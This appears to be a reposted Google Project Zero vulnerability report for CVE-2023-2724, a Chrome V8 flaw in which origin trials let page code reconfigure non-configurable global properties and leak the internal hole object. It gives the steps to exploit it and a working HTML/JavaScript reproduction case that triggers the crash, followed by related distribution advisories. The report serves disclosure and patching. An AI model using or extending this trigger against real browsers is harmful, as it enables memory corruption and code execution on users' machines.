Headline
Chrome Internal JavaScript Object Access Via Origin Trials
Chrome suffers from an internal javascript object access vulnerability. suffers from a code execution vulnerability.
Chrome: Internal JavaScript object access via Origin Trials
VULNERABILITY DETAILS
JSObject::DefineAccessor
doesn’t ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.- The function is reachable from
IDLMemberInstaller::InstallAttributes
:
IDLMemberInstaller::InstallAttributes ->
InstallAttribute ->
Object::SetAccessorProperty ->
JSObject::DefineAccessor
- When an origin trial is activated through a
meta
tag,InstallAttributes
might be called on a JS object that has already been modified by the user code. - Some origin trials install attributes directly on the global object.
To exploit the issue:
- Add a non-configurable property to the global object.
- Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.
- Enable an origin trial that redefines the property as configurable.
- Delete the property.
After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.
[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164
VERSION
Google Chrome 112.0.5615.49 (Official Build) (arm64)
Chromium 114.0.5713.0 (Developer Build) (64-bit)
REPRODUCTION CASE
<body>
<script>
var container = [{}];
function trigger() { container[0] = documentPictureInPicture; }
Reflect.defineProperty(
globalThis,
'documentPictureInPicture',
{ configurable: false, writable: true, value: {} });
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.
for (let i = 0; i < 50000; i++) trigger();
// The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property
// on the global object.
meta = document.createElement('meta');
meta.httpEquiv = 'Origin-Trial';
meta.content =
'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +
'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +
'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';
document.head.appendChild(meta);
delete documentPictureInPicture;
trigger();
container[0].prop; // Trying to access a property of the hole object should cause to a crash.
</script>
</body>
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero
This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.
Related CVE Numbers: CVE-2023-2724.
Found by: [email protected]
Related news
Gentoo Linux Security Advisory 202311-11 - Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution. Versions greater than or equal to 5.15.10_p20230623 are affected.
Gentoo Linux Security Advisory 202309-17 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions greater than or equal to 113.0.5672.126 are affected.
Debian Linux Security Advisory 5404-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.
Type confusion in V8 in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)